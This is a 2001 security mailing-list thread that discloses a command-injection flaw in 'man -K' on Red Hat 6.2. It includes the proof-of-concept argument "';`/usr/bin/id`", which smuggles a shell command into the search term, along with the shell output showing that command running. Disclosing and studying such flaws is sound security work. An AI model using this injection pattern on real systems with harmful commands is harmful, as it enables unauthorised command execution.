Re: man -K input validation

[Reb <reb () openrecords org>]

When I do the following on a Redhat 6.2 on 2.2.14:

 man -K "';`/usr/bin/id`"

I get repeatedly until I ctrl-c out of it.:

sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)'
/usr/man/
man3/Tk_DeleteSelHandler.3'
sh: syntax error near unexpected token `;uid=501(r'
sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)'
/usr/man/
man3/DeleteImg.3'
sh: syntax error near unexpected token `;uid=501(r'
sh: -c: line 1: `grep -q '';uid=501(reb) gid=501(reb) groups=501(reb)'
/usr/man/
man3/Tk_DeleteImage.3'

Reb
-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEV () SECURITYFOCUS COM]On Behalf Of Rasta C.
Shell
Sent: Tuesday, February 20, 2001 8:54 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: man -K input validation

I don't know if this will be any interesting since i don't think
it can gives you man uid/gid, but while looking at the man source code to
see whats seg-faulting the -K <longbuff> (didn't find anything, maybe
it's the grep that faults?) I notice that the -K <input> line is not
being validated before calling system, so a: man -K "';`/usr/bin/id`"
will run /usr/bin/id by man for you. luckily there's a setuid/gid call
before
system.


--
http://www.rshell.org
Join #shellcode on EFnet.
rasta () rshell org